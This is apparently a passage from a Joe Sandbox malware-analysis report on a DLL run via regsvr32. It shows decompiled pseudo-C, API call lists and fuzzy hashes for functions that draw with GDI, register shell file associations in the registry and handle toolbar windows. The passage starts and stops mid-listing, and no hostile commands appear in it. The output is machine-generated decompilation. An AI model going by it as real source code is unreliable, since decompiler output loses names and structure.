                                                                                                                • GetSysColor.USER32 ref: 1001E8C8
                                                                                                                  • Part of subcall function 1001FBA9: SetBkColor.GDI32(?,00000000), ref: 1001FBCA
                                                                                                                  • Part of subcall function 1001FBA9: ExtTextOutA.GDI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 1001FBDE
                                                                                                                • GetSysColor.USER32 ref: 1001E964
                                                                                                                • ExtTextOutA.GDI32(?,?,00000002,00000002,00000000,?,?,00000000), ref: 1001E9B3
                                                                                                                • GetSysColor.USER32 ref: 1001E9C0
                                                                                                                • GetSysColor.USER32 ref: 1001EA12
                                                                                                                • GetSysColor.USER32 ref: 1001EA17
                                                                                                                • GetSysColor.USER32 ref: 1001EA42
                                                                                                                • ExtTextOutA.GDI32(?,?,?,00000002,00000000,?,?,00000000), ref: 1001EA80
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1001EAE3
                                                                                                                • InflateRect.USER32 ref: 1001EB0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Text$Rect$CopyInfoItemMenu$CompatibleCreateExtentH_prolog3InflateObjectPoint32_memset_strlen
                                                                                                                • String ID: @
                                                                                                                • API String ID: 508737835-2766056989
                                                                                                                • Opcode ID: 5428d50d51fda364d8c0232b3add27609a6e1a55f3991b6f04190f8dabd9d7c1
                                                                                                                • Instruction ID: c4d23744143042771e1b460ff45129e85f7b6cd7eb916f0b423f65fde5d2866e
                                                                                                                • Opcode Fuzzy Hash: 5428d50d51fda364d8c0232b3add27609a6e1a55f3991b6f04190f8dabd9d7c1
                                                                                                                • Instruction Fuzzy Hash: 5BE12175600249AFDB49DFA8CD85EEE7BA9FF48350F014119FE169B291CB71E940CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100281CE Relevance: 35.4, APIs: 4, Strings: 16, Instructions: 405windowregistryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E100281CE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t154;
				void* _t175;
				intOrPtr _t188;
				intOrPtr _t191;
				intOrPtr _t201;
				char* _t204;
				intOrPtr _t209;
				intOrPtr _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				intOrPtr _t220;
				intOrPtr _t228;
				intOrPtr _t231;
				intOrPtr _t234;
				intOrPtr _t239;
				void* _t250;
				intOrPtr _t257;
				intOrPtr _t258;
				void* _t286;
				void* _t287;
				void* _t304;
				long _t337;
				intOrPtr _t338;
				char* _t339;
				void* _t340;
				void* _t342;
				intOrPtr _t343;
				intOrPtr _t344;
				char* _t345;
				struct HICON__* _t346;
				void* _t348;
				void* _t349;
				void* _t350;
				intOrPtr _t352;

				_t350 = __eflags;
				_t335 = __edx;
				_push(0x3c);
				E1004764D(0x1008fd53, __ebx, __edi, __esi);
				_t342 = __ecx;
				L1000140B(_t348 - 0x2c, E100184C0());
				 *(_t348 - 4) =  *(_t348 - 4) & 0x00000000;
				L1000140B(_t348 - 0x14, E100184C0());
				 *(_t348 - 4) = 1;
				E10029AB3(__ebx, __edx,  *((intOrPtr*)(E1001E302(__ebx, __edi, __ecx, _t350) + 8)), _t348 - 0x2c);
				_t154 =  *((intOrPtr*)(_t342 + 8));
				 *((intOrPtr*)(_t348 - 0x3c)) = _t154;
				 *(_t348 - 0x30) = 1;
				if(_t154 == 0) {
					L45:
					L100013E3( *((intOrPtr*)(_t348 - 0x14)) + 0xfffffff0, _t335);
					return E10047725(L100013E3( &(( *(_t348 - 0x2c))[0xfffffffffffffff0]), _t335));
				} else {
					_t343 = _t342 + 4;
					_t352 = _t343;
					 *((intOrPtr*)(_t348 - 0x40)) = _t343;
					do {
						_t337 =  *(E10012115(_t348 - 0x3c));
						 *(_t348 - 0x44) = _t337;
						L100010F5(_t348 - 0x24, _t352, _t348 - 0x2c);
						 *(_t348 - 4) = 2;
						L100010F5(_t348 - 0x28, _t352, _t348 - 0x2c);
						 *(_t348 - 4) = 3;
						L100010F5(_t348 - 0x20, _t352, _t348 - 0x2c);
						 *(_t348 - 4) = 4;
						L100010F5(_t348 - 0x38, _t352, _t348 - 0x2c);
						_t257 =  *((intOrPtr*)(_t348 + 8));
						_t353 = _t257;
						 *(_t348 - 4) = 5;
						if(_t257 != 0) {
							L1000140B(_t348 - 0x34, E100184C0());
							_t345 =  *(_t348 - 0x2c);
							 *(_t348 - 4) = 6;
							_t346 = ExtractIconA( *(E1001E302(_t257, _t337, _t345, _t353) + 8), _t345,  *(_t348 - 0x30));
							_t250 = _t348 - 0x34;
							if(_t346 == 0) {
								L1000106E(_t250, ",%d", 0);
								_t349 = _t349 + 0xc;
							} else {
								L1000106E(_t250, ",%d",  *(_t348 - 0x30));
								_t349 = _t349 + 0xc;
								DestroyIcon(_t346);
							}
							L1000AFA8(_t348 - 0x38,  *((intOrPtr*)(_t348 - 0x34)),  *((intOrPtr*)( *((intOrPtr*)(_t348 - 0x34)) - 0xc)));
							 *(_t348 - 4) = 5;
							L100013E3( *((intOrPtr*)(_t348 - 0x34)) - 0x10, _t335);
						}
						L1000140B(_t348 - 0x18, E100184C0());
						 *(_t348 - 4) = 7;
						L1000140B(_t348 - 0x10, E100184C0());
						 *(_t348 - 4) = 8;
						L1000140B(_t348 - 0x1c, E100184C0());
						 *(_t348 - 4) = 9;
						_t175 =  *((intOrPtr*)( *_t337 + 0x64))(_t348 - 0x10, 5);
						_t344 =  *((intOrPtr*)(_t348 - 0x38));
						if(_t175 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t348 - 0x10)) - 0xc)) == 0) {
							_t338 =  *((intOrPtr*)(_t348 - 0x24));
							_t258 =  *((intOrPtr*)(_t348 - 0x28));
							goto L42;
						} else {
							_push(6);
							_push(_t348 - 0x1c);
							if( *((intOrPtr*)( *_t337 + 0x64))() == 0) {
								E10018A1F(_t257, _t348 - 0x1c, _t348, _t348 - 0x10);
							}
							if(E10027494( *((intOrPtr*)(_t348 - 0x10)),  *((intOrPtr*)(_t348 - 0x1c)), 0) != 0) {
								__eflags = _t257;
								if(_t257 == 0) {
									L17:
									_t188 =  *((intOrPtr*)( *_t337 + 0x64))(_t348 - 0x14, 0);
									__eflags = _t188;
									if(_t188 == 0) {
										L22:
										_t339 = "ddeexec";
										_push(_t339);
										L1000106E(_t348 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t348 - 0x10)));
										_t349 = _t349 + 0x10;
										_t191 = E10027494( *((intOrPtr*)(_t348 - 0x14)), "[open(\"%1\")]", 0);
										__eflags = _t191;
										if(_t191 == 0) {
											L16:
											L100013E3( *((intOrPtr*)(_t348 - 0x1c)) + 0xfffffff0, _t335);
											L100013E3( *((intOrPtr*)(_t348 - 0x10)) + 0xfffffff0, _t335);
											L100013E3( &(( *(_t348 - 0x18))[0xfffffffffffffff0]), _t335);
											_t298 = _t344 - 0x10;
											goto L13;
										}
										__eflags = _t257;
										if(_t257 == 0) {
											_push(" \"%1\"");
											_t304 = _t348 - 0x24;
											L28:
											E1000B029(_t304);
											L29:
											_push("command");
											L1000106E(_t348 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t348 - 0x10)));
											_t338 =  *((intOrPtr*)(_t348 - 0x24));
											_t349 = _t349 + 0x10;
											_t201 = E10027494( *((intOrPtr*)(_t348 - 0x14)), _t338, 0);
											__eflags = _t201;
											if(_t201 != 0) {
												__eflags = _t257;
												_t258 =  *((intOrPtr*)(_t348 - 0x28));
												if(_t257 == 0) {
													L34:
													_t335 = _t348 - 0x18;
													 *((intOrPtr*)( *( *(_t348 - 0x44)) + 0x64))(_t348 - 0x18, 4);
													_t204 =  *(_t348 - 0x18);
													__eflags =  *((intOrPtr*)(_t204 - 0xc));
													if( *((intOrPtr*)(_t204 - 0xc)) == 0) {
														L42:
														L100013E3( *((intOrPtr*)(_t348 - 0x1c)) + 0xfffffff0, _t335);
														L100013E3( *((intOrPtr*)(_t348 - 0x10)) + 0xfffffff0, _t335);
														L100013E3( &(( *(_t348 - 0x18))[0xfffffffffffffff0]), _t335);
														L100013E3(_t344 - 0x10, _t335);
														__eflags =  *((intOrPtr*)(_t348 - 0x20)) + 0xfffffff0;
														L100013E3( *((intOrPtr*)(_t348 - 0x20)) + 0xfffffff0, _t335);
														_t286 = _t258 - 0x10;
														L43:
														L100013E3(_t286, _t335);
														_t287 = _t338 - 0x10;
														goto L44;
													}
													 *(_t348 - 0x44) = 0x208;
													 *((intOrPtr*)(_t348 - 0x48)) = RegQueryValueA(0x80000000,  *(_t348 - 0x18), L100011F4(_t348 - 0x14, 0x208), _t348 - 0x44);
													E1000FED3(_t348 - 0x14, 0xffffffff);
													__eflags =  *((intOrPtr*)(_t348 - 0x48));
													if( *((intOrPtr*)(_t348 - 0x48)) != 0) {
														L38:
														_t209 = E10027494( *(_t348 - 0x18),  *((intOrPtr*)(_t348 - 0x10)), 0);
														__eflags = _t209;
														if(_t209 != 0) {
															__eflags =  *((intOrPtr*)(_t348 + 8));
															if( *((intOrPtr*)(_t348 + 8)) != 0) {
																L1000106E(_t348 - 0x14, "%s\\ShellNew",  *(_t348 - 0x18));
																_t349 = _t349 + 0xc;
																E10027494( *((intOrPtr*)(_t348 - 0x14)), 0x1009d925, "NullFile");
															}
														}
														goto L42;
													}
													_t213 =  *((intOrPtr*)(_t348 - 0x14));
													__eflags =  *((intOrPtr*)(_t213 - 0xc));
													if( *((intOrPtr*)(_t213 - 0xc)) == 0) {
														goto L38;
													}
													_t214 = E1001BBE2(_t258, _t348 - 0x14, _t335, _t338, _t344, _t348,  *((intOrPtr*)(_t348 - 0x10)));
													__eflags = _t214;
													if(_t214 != 0) {
														goto L42;
													}
													goto L38;
												}
												_push("command");
												L1000106E(_t348 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t348 - 0x10)));
												_t349 = _t349 + 0x10;
												_t217 = E10027494( *((intOrPtr*)(_t348 - 0x14)), _t258, 0);
												__eflags = _t217;
												if(_t217 == 0) {
													goto L42;
												}
												_push("command");
												L1000106E(_t348 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t348 - 0x10)));
												_t349 = _t349 + 0x10;
												_t220 = E10027494( *((intOrPtr*)(_t348 - 0x14)),  *((intOrPtr*)(_t348 - 0x20)), 0);
												__eflags = _t220;
												if(_t220 == 0) {
													goto L42;
												}
												goto L34;
											}
											L100013E3( *((intOrPtr*)(_t348 - 0x1c)) + 0xfffffff0, _t335);
											L100013E3( *((intOrPtr*)(_t348 - 0x10)) + 0xfffffff0, _t335);
											L100013E3( &(( *(_t348 - 0x18))[0xfffffffffffffff0]), _t335);
											L100013E3(_t344 - 0x10, _t335);
											L100013E3( *((intOrPtr*)(_t348 - 0x20)) + 0xfffffff0, _t335);
											_t286 =  *((intOrPtr*)(_t348 - 0x28)) + 0xfffffff0;
											goto L43;
										}
										_push(_t339);
										L1000106E(_t348 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t348 - 0x10)));
										_t349 = _t349 + 0x10;
										_t228 = E10027494( *((intOrPtr*)(_t348 - 0x14)), "[print(\"%1\")]", 0);
										__eflags = _t228;
										if(_t228 == 0) {
											goto L16;
										}
										_push(_t339);
										L1000106E(_t348 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t348 - 0x10)));
										_t349 = _t349 + 0x10;
										_t231 = E10027494( *((intOrPtr*)(_t348 - 0x14)), "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]", 0);
										__eflags = _t231;
										if(_t231 == 0) {
											goto L16;
										}
										_t340 = " /dde";
										E1000B029(_t348 - 0x24, _t340);
										E1000B029(_t348 - 0x28, _t340);
										_push(_t340);
										L21:
										_t304 = _t348 - 0x20;
										goto L28;
									}
									_t234 =  *((intOrPtr*)(_t348 - 0x14));
									__eflags =  *((intOrPtr*)(_t234 - 0xc));
									if( *((intOrPtr*)(_t234 - 0xc)) == 0) {
										goto L22;
									}
									E1000B029(_t348 - 0x24, " \"%1\"");
									__eflags = _t257;
									if(_t257 == 0) {
										goto L29;
									}
									E1000B029(_t348 - 0x28, " /p \"%1\"");
									_push(" /pt \"%1\" \"%2\" \"%3\" \"%4\"");
									goto L21;
								}
								L1000106E(_t348 - 0x14, "%s\\DefaultIcon",  *((intOrPtr*)(_t348 - 0x10)));
								_t349 = _t349 + 0xc;
								_t239 = E10027494( *((intOrPtr*)(_t348 - 0x14)), _t344, 0);
								__eflags = _t239;
								if(_t239 != 0) {
									goto L17;
								}
								goto L16;
							} else {
								L100013E3( *((intOrPtr*)(_t348 - 0x1c)) + 0xfffffff0, _t335);
								L100013E3( *((intOrPtr*)(_t348 - 0x10)) + 0xfffffff0, _t335);
								L100013E3( &(( *(_t348 - 0x18))[0xfffffffffffffff0]), _t335);
								_t298 =  *((intOrPtr*)(_t348 - 0x38)) + 0xfffffff0;
								L13:
								L100013E3(_t298, _t335);
								L100013E3( *((intOrPtr*)(_t348 - 0x20)) + 0xfffffff0, _t335);
								L100013E3( *((intOrPtr*)(_t348 - 0x28)) + 0xfffffff0, _t335);
								_t287 =  *((intOrPtr*)(_t348 - 0x24)) + 0xfffffff0;
								goto L44;
							}
						}
						L44:
						 *(_t348 - 4) = 1;
						L100013E3(_t287, _t335);
						 *(_t348 - 0x30) =  *(_t348 - 0x30) + 1;
					} while ( *((intOrPtr*)(_t348 - 0x3c)) != 0);
					goto L45;
				}
			}





































                                                                                                                0x100281ce
                                                                                                                0x100281ce
                                                                                                                0x100281ce
                                                                                                                0x100281d5
                                                                                                                0x100281da
                                                                                                                0x100281e5
                                                                                                                0x100281ea
                                                                                                                0x100281f7
                                                                                                                0x100281fc
                                                                                                                0x1002820d
                                                                                                                0x10028212
                                                                                                                0x10028217
                                                                                                                0x1002821a
                                                                                                                0x10028221
                                                                                                                0x100286ed
                                                                                                                0x100286f3
                                                                                                                0x10028708
                                                                                                                0x10028227
                                                                                                                0x10028227
                                                                                                                0x10028227
                                                                                                                0x1002822a
                                                                                                                0x1002822d
                                                                                                                0x10028239
                                                                                                                0x10028242
                                                                                                                0x10028245
                                                                                                                0x10028251
                                                                                                                0x10028255
                                                                                                                0x10028261
                                                                                                                0x10028265
                                                                                                                0x10028271
                                                                                                                0x10028275
                                                                                                                0x1002827a
                                                                                                                0x1002827d
                                                                                                                0x1002827f
                                                                                                                0x10028283
                                                                                                                0x1002828e
                                                                                                                0x10028293
                                                                                                                0x10028296
                                                                                                                0x100282ad
                                                                                                                0x100282b1
                                                                                                                0x100282b4
                                                                                                                0x100282d8
                                                                                                                0x100282dd
                                                                                                                0x100282b6
                                                                                                                0x100282bf
                                                                                                                0x100282c4
                                                                                                                0x100282c8
                                                                                                                0x100282c8
                                                                                                                0x100282ea
                                                                                                                0x100282f2
                                                                                                                0x100282f6
                                                                                                                0x100282f6
                                                                                                                0x10028304
                                                                                                                0x10028309
                                                                                                                0x10028316
                                                                                                                0x1002831b
                                                                                                                0x10028328
                                                                                                                0x10028337
                                                                                                                0x1002833b
                                                                                                                0x10028340
                                                                                                                0x10028343
                                                                                                                0x10028692
                                                                                                                0x10028695
                                                                                                                0x00000000
                                                                                                                0x10028356
                                                                                                                0x10028358
                                                                                                                0x1002835d
                                                                                                                0x10028365
                                                                                                                0x1002836e
                                                                                                                0x1002836e
                                                                                                                0x10028382
                                                                                                                0x100283d1
                                                                                                                0x100283d3
                                                                                                                0x1002841e
                                                                                                                0x10028428
                                                                                                                0x1002842b
                                                                                                                0x1002842d
                                                                                                                0x10028467
                                                                                                                0x10028467
                                                                                                                0x1002846c
                                                                                                                0x10028479
                                                                                                                0x1002847e
                                                                                                                0x1002848b
                                                                                                                0x10028490
                                                                                                                0x10028492
                                                                                                                0x100283f8
                                                                                                                0x100283fe
                                                                                                                0x10028409
                                                                                                                0x10028414
                                                                                                                0x10028419
                                                                                                                0x00000000
                                                                                                                0x10028419
                                                                                                                0x10028498
                                                                                                                0x1002849a
                                                                                                                0x10028511
                                                                                                                0x10028516
                                                                                                                0x10028519
                                                                                                                0x10028519
                                                                                                                0x1002851e
                                                                                                                0x1002851e
                                                                                                                0x1002852f
                                                                                                                0x10028534
                                                                                                                0x10028537
                                                                                                                0x10028540
                                                                                                                0x10028545
                                                                                                                0x10028547
                                                                                                                0x10028588
                                                                                                                0x1002858a
                                                                                                                0x1002858d
                                                                                                                0x100285e9
                                                                                                                0x100285f0
                                                                                                                0x100285f4
                                                                                                                0x100285f7
                                                                                                                0x100285fa
                                                                                                                0x100285fe
                                                                                                                0x10028698
                                                                                                                0x1002869e
                                                                                                                0x100286a9
                                                                                                                0x100286b4
                                                                                                                0x100286bc
                                                                                                                0x100286c4
                                                                                                                0x100286c7
                                                                                                                0x100286cc
                                                                                                                0x100286cf
                                                                                                                0x100286cf
                                                                                                                0x100286d4
                                                                                                                0x00000000
                                                                                                                0x100286d4
                                                                                                                0x1002860d
                                                                                                                0x1002862d
                                                                                                                0x10028630
                                                                                                                0x10028635
                                                                                                                0x10028639
                                                                                                                0x10028653
                                                                                                                0x1002865b
                                                                                                                0x10028660
                                                                                                                0x10028662
                                                                                                                0x10028664
                                                                                                                0x10028668
                                                                                                                0x10028676
                                                                                                                0x1002867b
                                                                                                                0x1002868b
                                                                                                                0x1002868b
                                                                                                                0x10028668
                                                                                                                0x00000000
                                                                                                                0x10028662
                                                                                                                0x1002863b
                                                                                                                0x1002863e
                                                                                                                0x10028642
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002864a
                                                                                                                0x1002864f
                                                                                                                0x10028651
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028651
                                                                                                                0x1002858f
                                                                                                                0x100285a0
                                                                                                                0x100285a5
                                                                                                                0x100285ae
                                                                                                                0x100285b3
                                                                                                                0x100285b5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100285bb
                                                                                                                0x100285cc
                                                                                                                0x100285d1
                                                                                                                0x100285dc
                                                                                                                0x100285e1
                                                                                                                0x100285e3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100285e3
                                                                                                                0x1002854f
                                                                                                                0x1002855a
                                                                                                                0x10028565
                                                                                                                0x1002856d
                                                                                                                0x10028578
                                                                                                                0x10028580
                                                                                                                0x00000000
                                                                                                                0x10028580
                                                                                                                0x1002849c
                                                                                                                0x100284a9
                                                                                                                0x100284ae
                                                                                                                0x100284bb
                                                                                                                0x100284c0
                                                                                                                0x100284c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100284c8
                                                                                                                0x100284d5
                                                                                                                0x100284da
                                                                                                                0x100284e7
                                                                                                                0x100284ec
                                                                                                                0x100284ee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100284f4
                                                                                                                0x100284fd
                                                                                                                0x10028506
                                                                                                                0x1002850b
                                                                                                                0x1002845f
                                                                                                                0x1002845f
                                                                                                                0x00000000
                                                                                                                0x1002845f
                                                                                                                0x1002842f
                                                                                                                0x10028432
                                                                                                                0x10028436
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028440
                                                                                                                0x10028445
                                                                                                                0x10028447
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028455
                                                                                                                0x1002845a
                                                                                                                0x00000000
                                                                                                                0x1002845a
                                                                                                                0x100283e1
                                                                                                                0x100283e6
                                                                                                                0x100283ef
                                                                                                                0x100283f4
                                                                                                                0x100283f6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028384
                                                                                                                0x1002838a
                                                                                                                0x10028395
                                                                                                                0x100283a0
                                                                                                                0x100283a8
                                                                                                                0x100283ab
                                                                                                                0x100283ab
                                                                                                                0x100283b6
                                                                                                                0x100283c1
                                                                                                                0x100283c9
                                                                                                                0x00000000
                                                                                                                0x100283c9
                                                                                                                0x10028382
                                                                                                                0x100286d7
                                                                                                                0x100286d7
                                                                                                                0x100286db
                                                                                                                0x100286e0
                                                                                                                0x100286e3
                                                                                                                0x00000000
                                                                                                                0x1002822d

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100281D5
                                                                                                                  • Part of subcall function 10029AB3: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10029ADC
                                                                                                                  • Part of subcall function 10029AB3: GetShortPathNameA.KERNEL32 ref: 10029AF3
                                                                                                                • ExtractIconA.SHELL32(?,?,00000001), ref: 100282A7
                                                                                                                • DestroyIcon.USER32(00000000), ref: 100282C8
                                                                                                                  • Part of subcall function 10027494: lstrlenA.KERNEL32(?), ref: 100274A0
                                                                                                                  • Part of subcall function 10027494: RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 100274B4
                                                                                                                • RegQueryValueA.ADVAPI32(80000000,?,00000000,?), ref: 10028622
                                                                                                                  • Part of subcall function 10027494: RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 100274CE
                                                                                                                  • Part of subcall function 10027494: lstrlenA.KERNEL32(?), ref: 100274DB
                                                                                                                  • Part of subcall function 10027494: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 100274F0
                                                                                                                  • Part of subcall function 10027494: RegCloseKey.ADVAPI32(?), ref: 100274FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$IconNamelstrlen$CloseCreateDestroyExtractFileH_prolog3ModulePathQueryShort
                                                                                                                • String ID: "%1"$ /dde$ /p "%1"$ /pt "%1" "%2" "%3" "%4"$%s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$,%d$NullFile$[open("%1")]$[print("%1")]$[printto("%1","%2","%3","%4")]$command$ddeexec
                                                                                                                • API String ID: 4251081318-4043335175
                                                                                                                • Opcode ID: 4c32ff4bc902e0c98f2780655bd273f9fef7291b1b55e839649e5e4854e4e306
                                                                                                                • Instruction ID: cc2a2a3f3ee0db5eddfe98f37bb65f156932ebb08ca72f69f933ffad2634399a
                                                                                                                • Opcode Fuzzy Hash: 4c32ff4bc902e0c98f2780655bd273f9fef7291b1b55e839649e5e4854e4e306
                                                                                                                • Instruction Fuzzy Hash: 44F15839D0020AABEB04EBE4CC96BEEB7B4EF04354F500118F625772D6DB70AA45CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10037781 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 410windowstringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E10037781(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				CHAR* _t151;
				void* _t159;
				signed int _t195;
				signed int _t232;
				signed int _t246;
				signed int _t247;
				signed int _t256;
				signed int _t257;
				int _t267;
				signed int _t269;
				signed int _t318;
				void* _t336;
				int _t341;
				signed int _t342;
				int _t346;
				struct HWND__** _t347;
				signed int _t348;
				RECT* _t350;
				int _t351;
				struct tagMENUITEMINFOA _t352;
				int _t353;
				intOrPtr _t354;
				void* _t358;
				void* _t364;

				_t364 = __eflags;
				_t336 = __edx;
				_push(0xf4);
				E1004764D(0x10090c41, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t358 + 0x60)) = __ecx;
				L1000140B(_t358 + 0x64, E100184C0());
				_t338 = lstrlenA;
				 *(_t358 - 4) =  *(_t358 - 4) & 0x00000000;
				_t265 = "ReBarWindow32";
				_t346 = lstrlenA("ReBarWindow32") + 1;
				_t151 = L100011F4(_t358 + 0x64, _t346);
				_t347 =  *(_t358 + 0x74);
				GetClassNameA( *_t347, _t151, _t346);
				E1000FED3(_t358 + 0x64, 0xffffffff);
				 *(_t358 + 0x74) = E10014011(_t358 + 0x64, lstrlenA, _t347, _t364,  *_t347);
				if(E1001BBE2("ReBarWindow32", _t358 + 0x64, _t336, lstrlenA, _t347, _t358, _t265) != 0) {
					L33:
					_t348 = 0;
					L6:
					L100013E3( *((intOrPtr*)(_t358 + 0x64)) + 0xfffffff0, _t336);
					 *[fs:0x0] =  *((intOrPtr*)(_t358 - 0xc));
					return _t348;
				}
				_t267 =  *(_t358 + 0x74);
				if(_t267 == 0 || E100203AA(_t267, 0x1009f7c8) == 0) {
					goto L33;
				} else {
					_t159 = E10014B68(_t267);
					if(_t159 == 0) {
						L7:
						E1001E619(_t267, _t358, _t338, _t347, __eflags);
						 *(_t358 - 4) = 1;
						L1000140B(_t358 + 0x70, E100184C0());
						 *(_t358 - 4) = 2;
						L1000140B(_t358 + 0x5c, E100184C0());
						 *(_t358 - 4) = 3;
						E1000C4AC(_t358 + 0x28);
						_push( *((intOrPtr*)(_t358 + 0x60)));
						 *(_t358 - 4) = 4;
						L1000CD6F(_t267, _t358 - 0x30, _t338, _t347, __eflags);
						_t268 = SendMessageA;
						 *(_t358 - 4) = 5;
						 *(_t358 - 0x100) = 0x50;
						 *((intOrPtr*)(_t358 - 0xfc)) = 0x10;
						SendMessageA( *(_t267 + 0x20), 0x41d, _t347[3], _t358 - 0x100);
						_t34 =  *(_t358 + 0x74) + 0x20; // 0x100ad5f0
						SendMessageA( *_t34, 0x409, _t347[3], _t358 - 0x1c);
						_t341 = lstrlenA("ToolbarWindow32") + 1;
						GetClassNameA( *(_t358 - 0xe0), L100011F4(_t358 + 0x64, _t341), _t341);
						E1000FED3(_t358 + 0x64, 0xffffffff);
						_t342 = E10014011(_t358 + 0x64, _t341, _t347, __eflags,  *(_t358 - 0xe0));
						 *(_t358 + 0x20) = _t342;
						__eflags = E1001BBE2(SendMessageA, _t358 + 0x64, _t336, _t342, _t347, _t358, "ToolbarWindow32");
						if(__eflags != 0) {
							L32:
							 *(_t358 - 4) = 4;
							L1000CDC3(_t268, _t358 - 0x30, _t342, _t347, __eflags);
							 *(_t358 - 4) = 3;
							L1000CD56(_t358 + 0x28);
							L100013E3( *((intOrPtr*)(_t358 + 0x5c)) + 0xfffffff0, _t336);
							__eflags =  *((intOrPtr*)(_t358 + 0x70)) + 0xfffffff0;
							L100013E3( *((intOrPtr*)(_t358 + 0x70)) + 0xfffffff0, _t336);
							 *(_t358 - 4) = 0;
							E1001E680(_t268, _t358, _t342, _t347, __eflags);
							goto L33;
						}
						__eflags = _t342;
						if(__eflags == 0) {
							goto L32;
						}
						__eflags = E100203AA(_t342, 0x1009f474);
						if(__eflags == 0) {
							goto L32;
						}
						_t350 =  &(_t347[6]);
						__eflags = _t350;
						 *(_t358 - 0x14) = _t350->left;
						 *(_t358 + 0x24) = _t350;
						E1000C931( *(_t358 + 0x74), _t358 - 0x1c);
						E1000C8F5(_t342, _t358 - 0x1c);
						_t351 = E100353F2(_t342);
						 *(_t358 + 0x58) = _t351;
						while(1) {
